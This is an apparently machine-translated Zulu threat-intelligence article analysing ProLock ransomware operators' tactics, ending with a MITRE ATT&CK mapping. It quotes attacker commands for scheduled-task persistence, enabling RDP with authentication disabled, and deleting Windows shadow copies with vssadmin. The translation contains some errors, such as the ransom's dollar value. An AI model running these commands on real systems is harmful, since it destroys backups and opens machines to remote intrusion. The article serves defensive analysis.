Impumelelo yokuhlaselwa kwe-ransomware ezinhlanganweni emhlabeni jikelele igqugquzela abahlaseli abasha abaningi ukuthi bangene emdlalweni. Omunye walaba badlali abasha yiqembu elisebenzisa i-ProLock ransomware. Ibonakale ngoMashi 2020 njengomlandeli wohlelo lwePwndLocker, oluqale ukusebenza ekupheleni kuka-2019. Ukuhlaselwa kwe-ProLock ransomware kuqondiswe kakhulu ezinhlanganweni zezezimali nezokunakekelwa kwempilo, izinhlangano zikahulumeni, kanye nomkhakha wezokudayisa. Muva nje, opharetha beProLock bahlasele ngempumelelo omunye wabakhiqizi abakhulu be-ATM, i-Diebold Nixdorf.
Kulokhu okuthunyelwe U-Oleg Skulkin, uchwepheshe oholayo we-Computer Forensics Laboratory ye-Group-IB, ihlanganisa amaqhinga ayisisekelo, amasu kanye nezinqubo (TTPs) ezisetshenziswa opharetha be-ProLock. I-athikili iphetha ngokuqhathanisa ne-MITER ATT&CK Matrix, isizindalwazi somphakathi esihlanganisa amaqhinga okuhlasela okuqondiwe asetshenziswa amaqembu ahlukahlukene obugebengu bamakhompuyutha.
Ithola ukufinyelela kokuqala
Ama-opharetha e-ProLock asebenzisa ama-vector amabili ayinhloko e-compromise eyinhloko: i-QakBot (Qbot) Trojan kanye namaseva e-RDP angavikelekile anamagama ayimfihlo abuthakathaka.
Ukuyekethisa ngeseva ye-RDP efinyeleleka ngaphandle kudume kakhulu phakathi kwabaqhubi be-ransomware. Ngokuvamile, abahlaseli bathenga ukufinyelela kuseva esengozini evela ezinkampanini zangaphandle, kodwa futhi ingatholwa ngamalungu eqembu ngokwawo.
Ivektha ethakazelisa kakhudlwana yokuyekethisa okuyinhloko uhlelo olungayilungele ikhompuyutha lwe-QakBot. Ngaphambilini, le Trojan yayihlotshaniswa nomunye umndeni we-ransomware - MegaCortex. Kodwa-ke, manje isisetshenziswa opharetha beProLock.
Ngokuvamile, i-QakBot isatshalaliswa ngemikhankaso yobugebengu bokweba imininingwane ebucayi. I-imeyili yobugebengu bokweba imininingwane ebucayi ingase iqukathe idokhumenti ye-Microsoft Office enamathiselwe noma isixhumanisi sefayela elitholakala kusevisi yesitoreji samafu, njenge-Microsoft OneDrive.
Kukhona namacala aziwayo okuthi i-QakBot ilayishwe enye iTrojan, i-Emotet, eyaziwa kakhulu ngokubamba iqhaza kwayo emikhankasweni esabalalisa iRyuk ransomware.
Ukugcwaliseka
Ngemuva kokulanda nokuvula idokhumenti enegciwane, umsebenzisi uyacelwa ukuthi avumele ama-macros ukuthi asebenze. Uma kuphumelele, i-PowerShell yethulwa, ezokuvumela ukuthi ulande futhi usebenzise ukulayisha kwe-QakBot kuseva yomyalo nokulawula.
Kubalulekile ukuqaphela ukuthi okufanayo kuyasebenza ku-ProLock: umthwalo okhokhelwayo ukhishwa efayeleni BMP noma I-JPG futhi ilayishwe kumemori usebenzisa i-PowerShell. Kwezinye izimo, umsebenzi ohleliwe usetshenziselwa ukuqalisa i-PowerShell.
Isikripthi seqoqo esisebenzisa i-ProLock ngesihleli somsebenzi:
schtasks.exe /CREATE /XML C:ProgramdataWinMgr.xml /tn WinMgr
schtasks.exe /RUN /tn WinMgr
del C:ProgramdataWinMgr.xml
del C:Programdatarun.batUkuhlanganiswa ohlelweni
Uma kungenzeka ukufaka ebucayini iseva ye-RDP futhi uthole ukufinyelela, khona-ke ama-akhawunti avumelekile asetshenziselwa ukuthola ukufinyelela kunethiwekhi. I-QakBot ibonakala ngezindlela ezihlukahlukene zokunamathisela. Ngokuvamile, le Trojan isebenzisa ukhiye wokubhalisa we-Run futhi idale imisebenzi kusihleli:
Ukuphina i-Qakbot ohlelweni usebenzisa ukhiye wokubhalisa we-Run
Kwezinye izimo, amafolda okuqalisa nawo asetshenziswa: isinqamuleli sibekwe lapho esikhomba ku-bootloader.
Ukuvikelwa kwe-bypass
Ngokuxhumana nomyalo neseva yokulawula, i-QakBot izama ukuzibuyekeza ngezikhathi ezithile, ngakho-ke ukuze igweme ukutholwa, uhlelo olungayilungele ikhompuyutha lungangena esikhundleni senguqulo yalo yamanje lufake olusha. Amafayela asebenzisekayo asayinwa ngesiginesha eyonakele noma engumgunyathi. Ukulayisha kokuqala okulayishwe yi-PowerShell kugcinwa kuseva ye-C&C ngesandiso I-PNG. Ngaphezu kwalokho, ngemva kokubulawa kuthathelwa indawo ifayela elisemthethweni calc.exe.
Futhi, ukufihla umsebenzi omubi, i-QakBot isebenzisa indlela yokujova ikhodi ezinqubweni, isebenzisa umhloli.exe.
Njengoba kushiwo, i-ProLock payload ifihliwe ngaphakathi kwefayela BMP noma I-JPG. Lokhu kungabuye kubhekwe njengendlela yokuvikela ukudlula.
Ukuthola imininingwane
I-QakBot inokusebenza kwe-keylogger. Ngaphezu kwalokho, ingalanda futhi isebenzise imibhalo eyengeziwe, isibonelo, i-Invoke-Mimikatz, inguqulo ye-PowerShell yensiza edumile ye-Mimikatz. Imibhalo enjalo ingasetshenziswa abahlaseli ukulahla imininingwane.
Ubuhlakani benethiwekhi
Ngemva kokuthola ukufinyelela kuma-akhawunti akhethekile, o-opharetha be-ProLock benza ukuhlola kwenethiwekhi, okungase kuhlanganise ukuskena kwechweba kanye nokuhlaziywa kwendawo ye-Active Directory. Ngokungeziwe emibhalweni ehlukahlukene, abahlaseli basebenzisa i-AdFind, elinye ithuluzi elidumile phakathi kwamaqembu e-ransomware, ukuze baqoqe ulwazi olumayelana Nohlu Lwemibhalo Olusebenzayo.
Ukunyuswa kwenethiwekhi
Ngokwesiko, enye yezindlela ezaziwa kakhulu zokuphromotha inethiwekhi Iphrothokholi ye-Remote Desktop. I-ProLock nayo yayihlukile. Abahlaseli banemibhalo ku-arsenal yabo ukuze bathole ukufinyelela bekude nge-RDP ukuze baqondise abasingathi.
Umbhalo we-BAT wokuthola ukufinyelela ngephrothokholi ye-RDP:
reg add "HKLMSystemCurrentControlSetControlTerminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
reg add "HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f
Ukukhipha imibhalo bekude, opharetha beProLock basebenzisa elinye ithuluzi elidumile, insiza ye-PsExec evela ku-Sysinternals Suite.
I-ProLock isebenza kubabungazi besebenzisa i-WMIC, okuwumugqa womyalo oyisixhumi esibonakalayo sokusebenza ne-Windows Management Instrumentation subsystem. Leli thuluzi liya ngokuya liduma phakathi kwabaqhubi be-ransomware.
Ukuqoqwa kwedatha
Njengabanye opharetha abaningi be-ransomware, iqembu elisebenzisa i-ProLock liqoqa idatha kunethiwekhi esengozini ukuze kwandiswe amathuba abo okuthola isihlengo. Ngaphambi kokuhlunga, idatha eqoqiwe igcinwa kungobo yomlando kusetshenziswa insiza ye-7Zip.
Exfiltration
Ukuze balayishe idatha, o-opharetha be-ProLock basebenzisa i-Rclone, ithuluzi lomugqa womyalo eliklanyelwe ukuvumelanisa amafayela namasevisi ahlukahlukene esitoreji samafu njenge-OneDrive, i-Google Drayivu, i-Mega, njll. Abahlaseli bahlala beqamba kabusha ifayela elisebenzisekayo ukuze balenze libukeke njengamafayela esistimu asemthethweni.
Ngokungafani nontanga yabo, opharetha beProLock namanje abanayo iwebhusayithi yabo yokushicilela idatha eyebiwe yezinkampani ezenqabile ukukhokha isihlengo.
Ukufinyelela umgomo wokugcina
Uma idatha isikhishiwe, ithimba lisebenzisa i-ProLock kuyo yonke inethiwekhi yebhizinisi. Ifayela kanambambili likhishwa efayeleni elinesandiso I-PNG noma I-JPG usebenzisa i-PowerShell futhi ifakwe kumemori:
Okokuqala, i-ProLock inqamula izinqubo ezishiwo ohlwini olwakhelwe ngaphakathi (okuthakazelisayo, isebenzisa kuphela izinhlamvu eziyisithupha zegama lenqubo, njengokuthi "winwor"), futhi inqamula izinsizakalo, kuhlanganise nalezo ezihlobene nokuphepha, njenge-CSFalconService ( CrowdStrike Falcon) usebenzisa umyalo inetha limise.
Bese, njengeminye imindeni eminingi ye-ransomware, abahlaseli basebenzisa umagazine ukususa amakhophi ethunzi le-Windows futhi ukhawule usayizi wawo ukuze angadalwa amakhophi amasha:
vssadmin.exe delete shadows /all /quiet
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=401MB
vssadmin.exe resize shadowstorage /for=C: /on=C: /maxsize=unboundedI-ProLock ingeza isandiso .proLock, .pr0Khiya noma .proL0ck kufayela ngalinye elibethelwe bese ubeka ifayela [INDLELA YOKUTHOLAKALA AMAfayili].TXT kufolda ngayinye. Leli fayela liqukethe iziqondiso zendlela yokususa ukubethela kwamafayela, okuhlanganisa isixhumanisi sesayithi lapho isisulu kufanele sifake khona i-ID ehlukile futhi sithole ulwazi lokukhokha:
Isenzakalo ngasinye se-ProLock siqukethe ulwazi mayelana nenani lesihlengo - kulokhu, ama-bitcoins angu-35, cishe ama-$ 312.
isiphetho
Abasebenzisi abaningi be-ransomware basebenzisa izindlela ezifanayo ukufeza izinhloso zabo. Ngesikhathi esifanayo, amanye amasu ahlukile eqenjini ngalinye. Njengamanje, kunenani elikhulayo lamaqembu obugebengu be-inthanethi asebenzisa i-ransomware emikhankasweni yawo. Kwezinye izimo, o-opharetha abafanayo bangase bahileleke ekuhlaselweni kusetshenziswa imindeni ehlukene ye-ransomware, ngakho-ke sizobona ngokwandayo ukunqwabelana kumaqhinga, amasu nezinqubo ezisetshenziswayo.
Ukwenza imephu nge-MITER ATT&CK Mapping
Iqhinga
Technique
Ukufinyelela Kwasekuqaleni (TA0001)
Amasevisi Akude Angaphandle (T1133), Okunamathiselwe Kwe-Spearphishing (T1193), I-Spearphishing Link (T1192)
Ukwenza (TA0002)
I-Powershell (T1086), I-Scripting (T1064), Ukusebenzisa Umsebenzisi (T1204), I-Windows Management Instrumentation (T1047)
Ukuphikelela (TA0003)
Okhiye Bokuqalisa Kwerejista / Ifolda Yokuqalisa (T1060), Umsebenzi Ohleliwe (T1053), Ama-Akhawunti Avumelekile (T1078)
Ukugwema Ukuvikela (TA0005)
Ukusayinda Ikhodi (T1116), Deobfuscate/Decode Files noma Ulwazi (T1140), Ikhubaza Amathuluzi Okuvikela (T1089), Ukususwa Kwefayela (T1107), Masquerading (T1036), Process Injection (T1055)
Ukufinyelela Kokuqinisekisa (TA0006)
I-Credential Dumping (T1003), i-Brute Force (T1110), i-Input Capture (T1056)
I-Discovery (TA0007)
I-Account Discovery (T1087), i-Domain Trust Discovery (T1482), i-File and Directory Discovery (T1083), i-Network Service Scanning (T1046), i-Network Share Discovery (T1135), i-Remote System Discovery (T1018)
I-Lateral Movement (TA0008)
Iphrothokholi Yedeskithophu Ekude (T1076), Ikhophi Yefayela Elikude (T1105), Amasheya Okulawula Kwe-Windows (T1077)
Iqoqo (TA0009)
Idatha evela kusistimu yendawo (T1005), Idatha esuka ku-Network Shared Drive (T1039), Idatha Emisiwe (T1074)
I-Command and Control (TA0011)
Imbobo Esetshenziswa Ngokujwayelekile (T1043), Isevisi Yewebhu (T1102)
I-Exfiltration (TA0010)
I-Data Compressed (T1002), Dlulisela Idatha Ku-akhawunti Yamafu (T1537)
Impact (TA0040)
Idatha Ibethelwe Impact (T1486), Vimbela Ukutholwa Kwesistimu (T1490)
Source: www.habr.com